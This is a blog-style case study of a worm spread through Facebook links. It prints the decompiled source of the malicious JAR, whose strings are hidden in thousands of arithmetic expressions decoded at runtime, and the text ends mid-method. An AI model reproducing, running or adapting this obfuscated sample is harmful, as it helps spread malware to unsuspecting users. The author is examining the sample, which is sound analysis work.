Worms distributed via Facebook: a case study

Today, I got a message from one of my friends on Facebook that was essentially a link to a zip file. Without thinking much, I messaged him back asking him to check his computer for infections and whatnot, since it seems like he’s spreading malicious software without even knowing it.

However, I downloaded the file and was curious about its contents. The zip file contained just one JAR, which I disassembled with the Java Decompiler. The archive contained only one class, which looked like this:

import java.io.File;
import java.io.IOException;
import java.io.InputStream;
import java.net.HttpURLConnection;
import java.net.URI;
import java.net.URL;
import java.nio.file.CopyOption;
import java.nio.file.Files;
import java.nio.file.Paths;
import java.text.DecimalFormat;
import javax.script.ScriptEngine;
import javax.script.ScriptEngineManager;
import javax.script.ScriptException;

public class SEHKFCJZGYHEDGSCHJBKM
{
  public static String PACVA()
    throws ScriptException
  {
    ScriptEngineManager VZMZHYUKGXVAIYWQQBWWL = new ScriptEngineManager();
    ScriptEngine PTTQWFAFBA = VZMZHYUKGXVAIYWQQBWWL.getEngineByName("js");
    String[] FMMNX = { "461136/4434", "-740+856", "-1351+1467", "7318-7206", "-6018+6076", "-5833+5880", "8921-8874", "-3549+3649", "2156-2048", "66010/1435", "5236-5136", "6455-6341", "-3201+3312", "-6069+6181", "-8068+8166", "723165/6515", "-866+986", "296-179", "-8422+8537", "940714/9314", "153216/1344", "980100/9900", "4586-4475", "8896-8786", "934-818", "325220/3220", "755150/6865", "-2768+2884", "1040-994", "-4323+4422", "4358-4247", "-8361+8470", "-3568+3615", "9307-9192", "367399/7817", "6364-6309", "680882/5581", "-9530+9627", "-6313+6427", "-5956+6074", "4048-3946", "996516/9227", "188734/1586", "-1297+1345", "49950/925", "-7790+7899", "120491/2459", "-4500+4606", "932715/8883", "375678/6957", "-821+868", "2350-2250", "-5300+5346", "4221-4121", "-6193+6290", "-9459+9575", "503685/7995", "8617-8517", "-751+859", "352824/5784", "473634/9666", "5740-5676", "-4301+4365", "9091-8987", "388948/3353", "-2422+2538", "1036448/9254", "-1145+1203", "338635/7205", "114962/2446", "5729-5629", "3460-3352", "438242/9527", "15300/153", "712386/6249", "29304/264", "-3670+3782", "-6717+6815", "169608/1528", "5796-5676", "3704-3587", "5110-4995", "4639-4538", "823878/7227", "-7619+7718", "3775-3664", "-5896+6006", "1583-1467", "515504/5104", "-3088+3198", "9432-9316", "-8803+8849", "973467/9833", "41958/378", "5618-5509", "410498/8734", "6263-6148", "3440-3393", "-8165+8280", "4485-4388", "3499-3448", "765856/6838", "-8928+8982", "949977/7983", "146946/1289", "6836-6714", "165750/1625", "5648-5600", "534726/4383", "5549-5428", "-7817+7872", "2329-2224", "364656/7597", "6840-6793", "204500/2045", "6791-6745", "-858+958", "-933+1030", "-6006+6122", "438669/6963", "464400/4644", "-9655+9763", "-4675+4736", "4630-4581", "255552/3993", "65728/1027", "282-178", "24244/209", "521884/4499", "4370-4258", "428852/7394", "-8317+8364", "-6763+6810", "-5202+5302", "970488/8986", "2514-2468", "1832-1732", "1523-1409", "23643/213", "1103424/9852", "5326-5228", "-6127+6238", "-3871+3991", 
"6867-6750", "392725/3415", "-4749+4850", "-5776+5890", "-3205+3304", "-7456+7567", "8827-8717", "-9022+9138", "864762/8562", "-9006+9116", "830-714", "9665-9619", "-5379+5478", "515928/4648", "232-123", "920-873", "679880/5912", "954-907", "-7518+7633", "1055020/9095", "5730-5631", "9911-9792", "-216+338", "-8026+8140", "902779/9307", "3459-3358", "6858-6740", "4569-4515", "5635-5520", "969870/8817", "-1690+1745", "-2335+2386", "-1700+1755", "-3491+3538", "1768-1668", "-8527+8573", "940400/9404", "51+46", "1070332/9227", "475965/7555", "876500/8765", "110160/1020", "-8488+8549", "6513-6464", "-3977+4041", "275008/4297", "271-167", "24+92", "-8228+8344", "-7760+7872", "348986/6017", "276595/5885", "408383/8689", "489200/4892", "-4338+4446", "411424/8944", "1099-999", "8779-8665", "577755/5205", "787360/7030", "5202-5104", "849261/7651", "4570-4450", "5673-5556", "9854-9739", "570-469", "9859-9745", "256806/2594", "-7435+7546", "1003-893", "586844/5059", "391072/3872", "7810/71", "-2739+2855", "5815-5769", "769527/7773", "2882-2771", "-5331+5440", "3704-3657", "-223+338", "43+4", "-7771+7893", "-1857+1912", "29606/262", "157-38", "-4504+4612", "14859/127", "-3845+3899", "52+45", "205-153", "9406-9305", "-159+257", "1221-1104", "-4114+4228", "356304/6852", "300050/6001", "-3154+3201", "670600/6706", "-1535+1581", "-353+453", "22116/228", "-2494+2610", "-8650+8713", "58900/589", "537948/4981", "7183-7122", "-4825+4874", "-5980+6044", "4230-4166", "681-577", "3211-3095", "-3992+4108", "3505-3393", "3529-3471", "367352/7816", "222169/4727", "-2078+2178", "-1343+1451", "9926-9880", "-5404+5504", "-8830+8944", "-212+323", "172368/1539", "6795-6697", "668220/6020", "1170-1050", "1568-1451", "-6107+6222", "468842/4642", "4864-4750", "-9579+9678", "516039/4649", "10061-9951", "892736/7696", "271690/2690", "22770/207", "695420/5995", "-6274+6320", "8463-8364", "3889-3778", "79352/728", "103823/2209", "112815/981", "183488/3904", "-900+1010", "7202-7105", "-6126+6230", 
"1888-1780", "-7554+7609", "7958-7909", "353685/6205", "757460/6260", "314-196", "-1626+1675", "-4310+4409", "955800/8850", "239904/2352", "63448/616", "77688/747", "-8671+8718", "-6461+6561", "7146-7100", "6634-6534", "745348/7684", "-9099+9215", "-8588+8651", "948900/9489", "5333-5225", "5673-5612", "-2901+2950", "8802-8738", "3540-3476", "515320/4955", "328744/2834", "9929-9813", "-2114+2226", "310648/5356", "1343-1296", "-9606+9653", "392100/3921", "953748/8831", "298356/6486", "-1503+1603", "-8551+8665", "6414-6303", "-6596+6708", "40474/413", "-9106+9217", "312000/2600", "634842/5426", "-7126+7241", "604990/5990", "1573-1459", "6356-6257", "-4539+4650", "-1946+2056", "-404+520", "-7874+7975", "177100/1610", "8260-8144", "6378-6332", "-9413+9512", "8608-8497", "7745-7636", "9396-9349", "5069-4954", "-2046+2093", "75504/1573", "8980-8931", "-8443+8544", "704-587", "3704-3650", "-8226+8344", "9739-9682", "-8466+8573", "297654/5222", "1103106/9762", "792400/7924", "231876/2052", "-175+296", "-9148+9264", "861840/7980", "3479-3432", "637-537", "1881-1835", "-4621+4721", "-6429+6526", "30972/267", "401058/6366", "8269-8169", "-1446+1554", "1524-1463", "-607+656", "544384/8506", "-77+141", "910936/8759", "-6292+6408", "-952+1068", "432-320", "4503-4445", "4280-4233", "63403/1349", "1630-1530", "-3359+3467", "8694-8648", "-9898+9998", "-9501+9615", "-8317+8428", "344400/3075", "7918-7820", "1937-1826", "550440/4587", "566748/4844", "-664+779", "1921-1820", "-4745+4859", "-90+189", "5102-4991", "512710/4661", "4931-4815", "9354-9253", "1841-1731", "1935-1819", "7728-7682", "-984+1083", "-2320+2431", "-6061+6170", "-9297+9344", "8749-8634", "172772/3676", "7104-6995", "167100/3342", "3885-3765", "249730/2210", "5086-4983", "5991-5872", "255702/2243", "1102452/9932", "-7111+7229", "901-786", "1022814/8742", "-8849+8899", "-2120+2234", "-4544+4592", "211600/1840", "-6274+6321", "-4806+4906", "1503-1457", "9123-9023", "-9471+9568", "1673-1557", "516663/8201", 
"168100/1681", "1271-1163", "4968-4907", "455798/9302", "178-114", "3851-3787", "-8979+9083", "219588/1893", "-8409+8525", "-5166+5278", "267728/4616", "-718+765", "1175/25", "-3527+3627", "372168/3446", "3410-3364", "163000/1630", "226404/1986", "434676/3916", "-4681+4793", "-9164+9262", "-3548+3659", "693360/5778", "-2693+2810", "-2637+2752", "717908/7108", "5303-5189", "-2731+2830", "-723+834", "104610/951", "-9596+9712", "3026-2925", "-6041+6151", "-8848+8964", "-3271+3317", "873378/8822", "-138+249", "553284/5076", "64907/1381", "1024075/8905", "8630-8583", "1004880/8374", "-5564+5685", "9321-9214", "-5459+5513", "-7983+8102", "9532-9418", "472920/8445", "9424-9307", "8710-8659", "-2118+2175", "-2895+2951", "727872/7136", "243800/4600", "-4843+4956", "-1623+1740", "127-80", "563900/5639", "-5123+5169", "-1379+1479", "-8028+8125", "-1526+1642", "-1564+1627", "-1387+1487", "5269-5161", "465674/7634", "9599-9550", "559488/8742", "255168/3987", "-8692+8796", "-5448+5564", "333964/2879", "146272/1306", "316912/5464", "-2654+2701", "55789/1187", "2830-2730", "-8025+8133", "-5354+5400", "-3513+3613", "7889-7775", "2562-2451", "4618-4506", "-7661+7759", "-4752+4863", "4344-4224", "265473/2269", "3999-3884", "6425-6324", "503082/4413", "-7247+7346", "1099233/9903", "3503-3393", "-4022+4138", "989901/9801", "702570/6387", "-1096+1212", "9719-9673", "6204-6105", "173493/1563", "3937-3828", "350009/7447", "475180/4132", "296899/6317", "441408/9196", "932047/9049", "408250/8165", "-9133+9187", "4282-4176", "-6171+6221", "3945-3892", "-1269+1369", "-9425+9534", "-5759+5862", "378399/3409", "-1606+1718", "5063-4944", "-4926+5029", "22896/216", "-1693+1740", "398400/3984", "5979-5933", "422100/4221", "699-602", "-9025+9141", "1005-942", "6836-6736", "-16+124", "6865-6804", "-7532+7581", "5546-5482", "9849-9785", "236392/2273", "3646-3530", "9700-9584", "1829-1717", "-4694+4752", "1674-1627", "215072/4576", "571100/5711", "-2242+2350", "4911-4865", "7494-7394", "4328-4214", 
"786324/7084", "1504-1392", "-1287+1385", "7438-7327", "-9758+9878", "1113255/9515", "149270/1298", "7910-7809", "-5446+5560", "-2597+2696", "8403-8292", "6187-6077", "912456/7866", "459752/4552", "-4820+4930", "603200/5200", "204102/4437", "-3759+3858", "-70+181", "-5797+5906", "-1775+1822", "9660-9545", "-4374+4421", "1632-1580", "-375+473", "302100/5700", "4544-4434", "156528/3261", "1140984/9752", "367696/6566", "8507-8406", "4765-4646", "354046/2926", "-1438+1542", "97965/933", "814890/7086", "214434/2166", "21411/183", "8063-8016", "459100/4591", "3599-3553", "720300/7203", "-1964+2061", "8943-8827", "130473/2071", "-7369+7469", "-6776+6884", "250893/4113", "-6563+6612", "-941+1005", "-2639+2703", "2532-2428", "576984/4974", "927072/7992", "-1031+1143", "8464-8406", "8908-8861", "-3720+3767", "339-239", "-4228+4336", "-8837+8883", "382300/3823", "1074678/9427", "-5054+5165", "-9446+9558", "863380/8810", "4664-4553", "3616-3496", "503919/4307", "-9418+9533", "2968-2867", "4701-4587", "45639/461", "2066-1955", "-7918+8028", "156832/1352", "4354-4253", "241120/2192", "591368/5098", "9411-9365", "576873/5827", "1631-1520", "-5437+5546", "-1804+1851", "4344-4229", "64390/1370", "270000/2250", "-4596+4695", "292215/2415", "-8277+8328", "4545-4491", "-1386+1437", "2346-2243", "-9088+9138", "3061-2958", "446742/8273", "-9369+9481", "5751-5698", "-4641+4745", "9108-9056", "-8694+8802", "3055/65", "835400/8354", "340-294", "-8685+8785", "-9353+9450", "-8575+8691", "6216-6153", "-6815+6915", "131976/1222", "2132-2071", "169246/3454", "-4519+4583", "7969-7905", "-1108+1212", "774184/6674", "2204-2088", "-2068+2180", "-184+242", "138509/2947", "170798/3634", "-1783+1883", "-9583+9691", "7109-7063", "233100/2331", "5122-5008", "-1388+1499", "-6357+6469", "5294-5196", "522255/4705", "481200/4010", "-6150+6267", "-8036+8151", "4379-4278", "795264/6976", "-4116+4215", "-914+1025", "2300-2190", "760032/6552", "5831-5730", "281050/2555", "818844/7059", "-258+304", 
"879219/8881", "-5270+5381", "-2550+2659", "103447/2201", "1080655/9397", "49397/1051", "3042-2921", "7728-7618", "5783-5662", "597380/5020", "7047-6933", "475266/8338", "3835-3715", "-1532+1648", "-3819+3936", "921100/7550", "2370-2253", "984507/9201", "8428-8331", "242350/4847", "-7520+7628", "4899-4852", "-4573+4673", "56672/1232", "884900/8849", "9778-9681", "310184/2674", "4174-4111", "-2481+2581", "-3565+3673", "2263-2202", "-2248+2297", "521344/8146", "783-719", "-8178+8282", "1127-1011", "292436/2521", "-3505+3617", "6152-6094", "6926-6879", "-5292+5339", "9172-9072", "-5868+5976", "-2886+2932", "-3792+3892", "307002/2693", "-8309+8420", "3722-3610", "796152/8124", "4108-3997", "9196-9076", "1141452/9756", "-5524+5639", "1509-1408", "-3635+3749", "-3524+3623", "743145/6695", "797940/7254", "3518-3402", "-3765+3866", "9318-9208", "321320/2770", "420992/9152", "54450/550", "3860-3749", "-2989+3098", "341878/7274", "259-144", "8592-8545", "2389-2287", "436696/4199", "29925/525", "241920/4480", "986391/8289", "180166/1514", "-5867+5974", "9682/94", "860328/7966", "95139/961", "109000/2180", "-6475+6583", "-1977+2085", "-9341+9440", "-1184+1238", "-2754+2801", "417-317", "184322/4007", "664800/6648", "-158+255", "724072/6242", "433062/6874", "831900/8319", "8219-8111", "2406-2345", "458-409", "7627-7563", "-8126+8190", "5123-5019", "2252-2136", "2215-2099", "-9857+9969", "-9502+9560", "9783-9736", "49585/1055", "-5483+5583", "5281-5173", "-5999+6045", "-9863+9963", "-4708+4822", "1106559/9969", "4170-4058", "564480/5760", "14541/131", "715560/5963", "2041-1924", "-1677+1792", "-1512+1613", "4193-4079", "8046-7947", "-2698+2809", "-1917+2027", "9262-9146", "564590/5590", "1096590/9969", "207524/1789", "-4853+4899", "-8373+8472", "-5724+5835", "-3859+3968", "9027-8980", "5481-5366", "440719/9377", "1096692/9294", "7994-7937", "-5094+5204", "-923+971", "140178/1149", "-2102+2223", "217455/2071", "7503-7399", "67275/575", "117502/1199", "-96+212", "732950/6850", 
"150654/1266", "935180/8132", "9140-9026", "3965-3918", "457500/4575", "-5149+5195", "-7968+8068", "-4507+4604", "4628-4512", "8529-8466", "-1951+2051", "142128/1316", "2803-2742", "2981-2932", "373888/5842", "-7803+7867", "-3481+3585", "867912/7482", "1098056/9466", "4589-4477", "523102/9019", "466099/9917", "3150-3103", "2871-2771", "3787-3679", "1985-1939", "2191-2091", "896-782", "-9742+9853", "-4046+4158", "-1825+1923", "-7838+7949", "-2369+2489", "127881/1093", "-3133+3248", "-15+116", "-4074+4188", "6263-6164", "-6760+6871", "498740/4534", "327-211", "677003/6703", "963050/8755", "-4744+4860", "159666/3471", "-8843+8942", "556998/5018", "-6050+6159", "-9492+9539", "-2911+3026", "-6888+6935", "10000-9898", "80605/1645", "840000/8000", "6044-5935", "9004-8956", "-5620+5671", "6921-6820", "8709-8605", "282204/2613", "551799/5157", "1462-1346", "196040/1690", "-1502+1558", "724500/6300", "-7241+7344", "-7042+7089", "2987-2887", "2998-2952", "948700/9487", "665032/6856", "5215-5099", "1685-1622", "635500/6355", "886032/8204", "-3041+3102", "-6426+6475", "-5368+5432", "-8437+8501", "3314-3210", "502512/4332", "8226-8110", "384-272", "-8085+8143", "-9624+9671", "4735-4688", "6298-6198", "2133-2025", "-9580+9626", "936800/9368", "468996/4114", "598401/5391", "1006432/8986", "-5164+5262", "223554/2014", "297-177", "-5081+5198", "1079505/9387", "3150-3049", "539106/4729", "-3266+3365", "7775-7664", "632-522", "8914-8798", "125846/1246", "-9813+9923", "336052/2897", "-8495+8541", "421146/4254", "543900/4900", "8900-8791", "1569-1522", "53130/462", "5283-5236", "-1876+1979", "1765-1709", "-5496+5597", "2527-2478", "6443-6392", "4589-4480", "949192/8044", "-1969+2082", "62496/1116", "1665-1616", "426351/3841", "8514-8407", "5502-5395", "-6205+6306", "202200/1685", "-9673+9720", "-3528+3628", "8190-8144", "792900/7929", "-3097+3194", "42920/370", "512379/8133", "1682-1582", "-9799+9907", "325374/5334", "-3629+3678", "9373-9309", "9910-9846", "8492-8388", "3709-3593", 
"-314+430", "773024/6902", "-4498+4556", "-3051+3098", "-1877+1924", "3973-3873", "9126-9018", "405674/8819", "-3324+3424", "7576-7462", "-2002+2113", "-3676+3788", "-2123+2221", "3391-3280", "-4212+4332", "285948/2444", "8375-8260", "85244/844", "-1212+1326", "5731-5632", "1014984/9144", "943470/8577", "1032400/8900", "5703-5602", "564520/5132", "1021728/8808", "-7969+8015", "100089/1011", "4250-4139", "-2662+2771", "-9744+9791", "-1809+1924", "-6689+6736", "-5495+5610", "26553/501", "240450/4809", "123157/1151", "1470-1370", "6683-6576", "7646-7543", "892944/8268", "-7903+8008", "-9493+9604", "4522-4408", "6733-6626", "2491-2382", "63648/1326", "-974+1093", "-7375+7422", "5360-5260", "-8597+8643", "9792-9692", "9606-9509", "6430-6314", "8674-8611", "3806-3706", "-4287+4395", "556564/9124", "-3391+3440", "-2978+3042", "79680/1245", "-6071+6175", "-5385+5501", "1045624/9014", "210560/1880", "3916-3858", "2362-2315", "9389-9342", "5879-5779", "-7364+7472", "-1520+1566", "3252-3152", "578436/5074", "-6109+6220", "-5976+6088", "585550/5975", "-9446+9557", "985440/8212", "1038609/8877", "-4636+4751", "-1572+1673", "623124/5466", "8179-8080", "-2712+2823", "167640/1524", "9021-8905", "202404/2004", "5054-4944", "216920/1870", "-3310+3356", "4209-4110", "-2159+2270", "340734/3126", "120179/2557", "-7902+8017", "7412-7365", "903096/8362", "-4047+4148", "242403/2499", "9298-9198", "-8192+8307", "486304/4676", "6598-6487", "-8030+8145", "-6241+6344", "-4493+4597", "4185-4067", "-879+989", "-3459+3513", "349997/3271", "976852/9484", "5966-5919", "-3411+3511", "182344/3964", "2235-2135", "7625-7528", "-7574+7690", "8912-8849", "-1478+1578", "-1709+1817", "3538/58", "4054-4005", "2587-2523", "1259-1195", "237328/2282", "4533-4417", "-9724+9840", "9587-9475", "-8624+8682", "9025-8978", "-3505+3552", "-6776+6876", "-1127+1235", "252310/5485", "384000/3840", "-4909+5023", "4687-4576", "-5529+5641", "592018/6041", "2062-1951", "-875+995", "59+58", "5763-5648", "716696/7096", 
"5551-5437", "321948/3252", "3421-3310", "693440/6304", "622-506", "873246/8646", "-9724+9834", "6942-6826", "1506-1460", "3668-3569", "1292-1181", "-2209+2318", "57058/1214", "-4141+4256", "3517-3470", "7962-7845", "5442-5339", "99450/850", "972828/7974", "487600/4876", "-6947+7064", "2505-2396", "6178-6124", "704032/6286", "267978/2271", "1955-1851", "-4400+4508", "1463-1360", "-4385+4502", "105252/1074", "9915-9868", "883-783", "9997-9951", "583200/5832", "-4007+4104", "-1537+1653", "155736/2472", "897-797", "9380-9272", "150548/2468", "-8525+8574", "291200/4550", "-2519+2583", "8242-8138", "2537-2421", "-4458+4574", "-1294+1406", "288492/4974", "-788+835", "-2215+2262", "826500/8265", "-5590+5698", "8339-8293", "791200/7912", "5954-5840", "-4323+4434", "2041-1929", "-5629+5727", "2080-1969", "1836-1716", "6651-6534", "8934-8819", "469145/4645", "-9366+9480", "-9454+9553", "466533/4203", "771870/7017", "-5958+6074", "6190-6089", "858220/7802", "-2275+2391", "57316/1246", "-3802+3901", "-9335+9446", "1005961/9229", "54285/1155", "8518-8403", "-7823+7870", "307450/6149", "346492/3364", "7775-7668", "320096/5716", "713275/6925", "1961-1843", "-7369+7423", "4643-4531", "5602-5488", "2084-1967", "653400/6050", "1162511/9769", "-809+925", "5629-5519", "-9486+9592", "-5744+5791", "247900/2479", "261602/5687", "-6643+6743", "-767+864", "527800/4550", "2130-2067", "3956-3856", "-2052+2160", "1753-1692", "277291/5659", "10005-9941", "823-759", "3723-3619", "-3753+3869", "192676/1661", "744240/6645", "-140+198", "259111/5513", "391933/8339", "-3610+3710", "697032/6454", "267214/5809", "-6853+6953", "-4639+4753", "-7456+7567", "1496-1384", "-7036+7134", "6588-6477", "465000/3875", "5386-5269", "-6060+6175", "-4392+4493", "5983-5869", "2003-1904", "446331/4021", "8427-8317", "1067316/9201", "2233-2132", "-8164+8274", "739152/6372", "-9629+9675", "-8107+8206", "1020534/9194", "107583/987", "-8207+8254", "-8666+8781", "-4648+4695", "377178/3398", "-5933+6055", "439264/3922", 
"-5252+5349", "8800-8746", "1122360/9353", "6+99", "-9332+9383", "115453/1079", "-4461+4578", "523786/5186", "-7627+7681", "8467-8351", "3440-3318", "391771/3467", "412801/8783", "7523-7423", "336536/7316", "-530+630", "3983-3886", "-8944+9060", "3534-3471", "-8670+8770", "198936/1842", "179157/2937", "8888-8839", "88832/1388", "266176/4159", "-2528+2632", "653312/5632", "8506-8390", "109+3", "36540/630", "6264-6217", "-1044+1091", "-1096+1196", "3430-3322", "8166-8120", "7310-7210", "7328-7214", "666888/6008", "9133-9021", "-5775+5873", "21201/191", "-7771+7891", "205452/1756", "2727-2612", "1001617/9917", "807234/7081", "-9221+9320", "484737/4367", "972400/8840", "-5479+5595", "-9760+9861", "4590-4480", "-6944+7060", "4402-4356", "166815/1685", "-7593+7704", "-7229+7338", "-8145+8192", "949210/8254", "-5149+5196", "186-88", "90720/840", "385627/3187", "-9405+9519", "8432-8381", "10053-9940", "615069/5257", "9752-9644", "-2829+2945", "2163-2041", "410795/3395", "-5891+5945", "873886/7163", "7707-7597", "199302/1689", "5252-5205", "-1977+2077", "274528/5968", "4480-4380", "-5515+5612", "-1265+1381", "-358+421", "-770+870", "1871-1763", "6490-6429", "-3079+3128", "-649+713", "9720-9656", "127816/1229", "285-169", "8737-8621", "1812-1700", "431926/7447", "6575-6528", "444761/9463", "-1608+1708", "-9295+9403", "1145-1099", "-3163+3263", "1128600/9900", "-8965+9076", "187936/1678", "19698/201", "877011/7901", "131880/1099", "1166373/9969", "645725/5615", "378144/3744", "884754/7761", "6682-6583", "5108-4997", "6978-6868", "465160/4010", "-5936+6037", "-8888+8998", "3233-3117", "112608/2448", "173547/1753", "934842/8422", "-9633+9742", "-8287+8334", "122015/1061", "-9185+9232", "511-401", "4695-4582", "246-196", "747054/7546", "16848/156", "6884-6764", "1041376/9298", "245814/4638", "-380+478", "908096/8108", "7467-7418", "1991-1939", "496314/4242", "463191/4497", "7616-7507", "283645/6035", "-631+731", "-9425+9471", "1527-1427", "356087/3671", "750-634", "581364/9228", 
"494500/4945", "-6637+6745", "63684/1044", "373282/7618", "2797-2733", "-7249+7313", "48152/463", "1267-1151", "390920/3370", "2699-2587", "-3741+3799", "4039-3992", "4388-4341", "10035-9935", "7472-7364", "3009-2963", "703900/7039", "-1768+1882", "3989-3878", "-2428+2540", "1859-1761", "-997+1108", "896160/7468", "9975-9858", "2826-2711", "5551-5450", "8779-8665", "-9608+9707", "-2889+3000", "-2791+2901", "1091444/9409", "962833/9533", "1060840/9644", "766876/6611", "8089-8043", "4537-4438", "8676-8565", "9995-9886", "202993/4319", "-2066+2181", "9641-9594", "1240-1186", "439400/4394", "-8126+8178", "1569-1465", "1031803/9131", "5888-5831", "-390+499", "6926-6821", "727015/7495", "2654-2601", "-4765+4873", "7305-7208", "22781/209", "9164/79", "9732-9682", "379807/8081", "635900/6359", "2162/47", "-868+968", "368697/3801", "601808/5188", "5757-5694", "742600/7426", "284364/2633", "66917/1097", "324086/6614", "5472-5408", "1816-1752", "8744-8640", "-3693+3809", "-3808+3924", "2347-2235", "7587-7529", "-4639+4686", "453033/9639", "-3968+4068", "7742-7634", "8105-8059", "1974-1874", "130302/1143", "-3867+3978", "9258-9146", "745388/7606", "-6147+6258", "1861-1741", "-4457+4574", "6584-6469", "617817/6117", "-1147+1261", "730125/7375", "5865-5754", "-6220+6330", "351712/3032", "2090-1989", "594660/5406", "-6298+6414", "124246/2701", "9357-9258", "-2918+3029", "4900-4791", "-6028+6075", "-1320+1435", "-8833+8880", "193341/3791", "-4000+4117", "7277-7176", "989-875", "4746-4649", "905502/7943", "-6491+6546", "-9536+9586", "265742/2507", "-3708+3829", "306663/6013", "333617/3239", "-1314+1412", "-8100+8205", "-3346+3454", "-2672+2719", "-9219+9319", "2704-2658", "315100/3151", "6663-6566", "3204-3088", "8995-8932", "79300/793", "645300/5975", "212646/3486", "192325/3925", "542336/8474", "627200/9800", "289-185", "4809-4693", "-9579+9695", "1069488/9549", "392312/6764", "-3401+3448", "-4316+4363", "-4287+4387", "5817-5709", "2605-2559", "379300/3793", "-6022+6136", 
"378732/3412", "1069600/9550", "-5605+5703", "-4162+4273", "-5050+5170", "2218-2101", "1060185/9219", "1033-932", "-73+187", "3148-3049", "1096125/9875", "-5793+5903", "762700/6575", "-5287+5388", "506770/4607", "-1516+1632", "292008/6348", "7366-7267", "-6651+6762", "896089/8221", "478-431", "7107-6992", "-1043+1090", "817807/8431", "431054/3653", "954856/8024", "489888/8748", "302275/2675", "1101411/9747", "-3884+3982", "234498/2299", "402400/4024", "6473-6358", "3742-3640", "39984/714", "323907/3207", "26+31", "290472/5928", "4416-4369", "3708-3608", "56212/1222", "493500/4935", "4365/45", "-6149+6265", "-9227+9290", "490200/4902", "-5823+5931", "297436/4876", "7551-7502", "5293-5229", "423808/6622", "897-793", "-7916+8032", "5589-5473", "909328/8119", "-7967+8025", "-6910+6957", "-297+344", "2929-2829", "889596/8237", "9310-9264", "4811-4711", "520524/4566", "5861-5750", "430528/3844", "842702/8599", "393828/3548", "305040/2542", "8613-8496", "2302-2187", "141703/1403", "-3132+3246", "5021-4922", "925-814", "6273-6163", "-37+153", "377033/3733", "1096920/9972", "7381-7265", "8255-8209", "9546-9447", "34410/310", "60495/555", "752/16", "5600-5485", "-2588+2635", "-3180+3284", "881-833", "458900/9178", "-2808+2908", "-8996+9108", "411125/3575", "797680/6760", "804417/7247", "374132/3092", "-3703+3814", "920920/8372", "7044-6927", "-6653+6705", "4896-4777", "3179-3064", "158766/3378", "-2723+2823", "108008/2348", "378800/3788", "-3091+3188", "84448/728", "4158/66", "240500/2405", "334692/3099", "1170-1109", "-4080+4129", "-4619+4683", "320704/5011", "1164-1060", "973008/8388", "5409-5293", "1091-979", "9141-9083", "9400-9353", "132258/2814", "-8116+8216", "9072/84", "1235-1189", "-4633+4733", "466260/4090", "-267+378", "828-716", "239218/2441", "-1013+1124", "-2563+2683", "282204/2412", "-6120+6235", "2101-2000", "128478/1127", "-3313+3412", "-209+320", "4665-4555", "6356-6240", "-8404+8505", "-7696+7806", "6898-6782", "458252/9962", "-5038+5137", "633810/5710", 
"1939-1830", "-590+637", "8526-8411", "-9907+9954", "3061-3005", "8114-8017", "-6036+6087", "-251+367", "990784/8768", "982702/8258", "3697-3577", "-5585+5686", "7841-7739", "-8818+8924", "-8833+8955", "8662-8551", "177168/3691", "211152/3984", "8061-7948", "23970/510", "-454+554", "-8770+8816", "893900/8939", "680746/7018", "-7301+7417", "-5137+5200", "796900/7969", "262980/2435", "3583-3522", "309925/6325", "-3669+3733", "321728/5027", "3372-3268", "-1671+1787", "-2469+2585", "220416/1968", "1270-1212", "2632-2585", "166051/3533", "4436-4336", "7173-7065", "6174-6128", "3342-3242", "-2003+2117", "806-695", "-1117+1229", "101234/1033", "9313-9202", "-7006+7126", "3224-3107", "3999-3884", "-8288+8389", "1654-1540", "-8290+8389", "1540-1429", "-6272+6382", "-4157+4273", "207-106", "105380/958", "-8677+8793", "267674/5819", "2797-2698", "2528-2417", "-5027+5136", "85822/1826", "7124-7009", "160223/3409", "3950-3836", "-7987+8101", "-5176+5289", "4243-4192", "-7105+7221", "5725-5605", "-6086+6196", "139412/2681", "-6411+6526", "-5359+5457", "-9676+9794", "963696/9448", "6949-6893", "-3881+3931", "291042/2553", "-2674+2721", "237100/2371", "-7411+7457", "2447-2347", "-3285+3382", "-797+913", "480249/7623", "3561-3461", "-9865+9973", "572119/9379", "6221-6172", "101184/1581", "236096/3689", "8640-8536", "348/3", "1021148/8803", "3495-3383", "-7999+8057", "290037/6171", "8674-8627", "56400/564", "1629-1521", "6936-6890", "96200/962", "4510-4396", "156954/1414", "-4414+4526", "697662/7119", "-6591+6702", "4246-4126", "-6488+6605", "4935-4820", "7059-6958", "-4843+4957", "-707+806", "354090/3190", "-7188+7298", "-2993+3109", "10069-9968", "853820/7762", "-7397+7513", "6739-6693", "701118/7082", "-5362+5473", "60+49", "7774-7727", "414-299", "454443/9669", "5125-5008", "349468/7132", "879564/7924", "-4999+5100", "5200-5149", "-9626+9738", "382928/3419", "-2817+2924", "86926/887", "918720/9280", "-289+402", "5813-5704", "264650/5293", "-3291+3400", "7701-7648", "-2363+2410", 
"-8995+9095", "-8600+8646", "-3987+4087", "-3321+3418", "5793-5677", "5534-5471", "3906-3806", "-5402+5510", "370819/6079", "158613/3237" };
    DecimalFormat dec = new DecimalFormat("#.#");
    StringBuilder CYBNAFHZKEIKXPLC = new StringBuilder(FMMNX.length);
    for (int i = 0; i < FMMNX.length; i++) {
      Object MHNZLISTNGUBBLYPW = PTTQWFAFBA.eval(FMMNX[i]);
      int HOFMVNSB = Integer.parseInt(dec.format(MHNZLISTNGUBBLYPW));
      CYBNAFHZKEIKXPLC.append((char)HOFMVNSB);
    }
    return CYBNAFHZKEIKXPLC.toString();
  }

  public static String CAHWNGGYPLSBBUUNSBJ() throws ScriptException {
    ScriptEngineManager VZMZHYUKGXVAIYWQQBWWL = new ScriptEngineManager();
    ScriptEngine PTTQWFAFBA = VZMZHYUKGXVAIYWQQBWWL.getEngineByName("js");
    String[] HYOZXBQ = { "1115-1048", "-6817+6875", "-3904+3996", "-5117+5209", "5298-5214", "-2006+2107", "85347/783", "-3448+3560", "538936/5858", "7300-7208" };
    DecimalFormat dec = new DecimalFormat("#.#");
    StringBuilder GPJSTAPR = new StringBuilder(HYOZXBQ.length);
    for (int i = 0; i < HYOZXBQ.length; i++) {
      Object XWHLAWQKM = PTTQWFAFBA.eval(HYOZXBQ[i]);
      int HOFMVNSB = Integer.parseInt(dec.format(XWHLAWQKM));
      GPJSTAPR.append((char)HOFMVNSB);
    }
    return GPJSTAPR.toString();
  }

  public static String YFQZBLOYEFEJKKEZX() throws ScriptException {
    ScriptEngineManager VZMZHYUKGXVAIYWQQBWWL = new ScriptEngineManager();
    ScriptEngine PTTQWFAFBA = VZMZHYUKGXVAIYWQQBWWL.getEngineByName("js");
    String[] FYTFHDCQEJALCVHVO = { "5128-5060", "-2483+2569", "-8949+9034", "-2140+2228", "-906+993", "233358/5073", "3644-3577", "-1064+1134", "234868/3308" };
    DecimalFormat dec = new DecimalFormat("#.#");
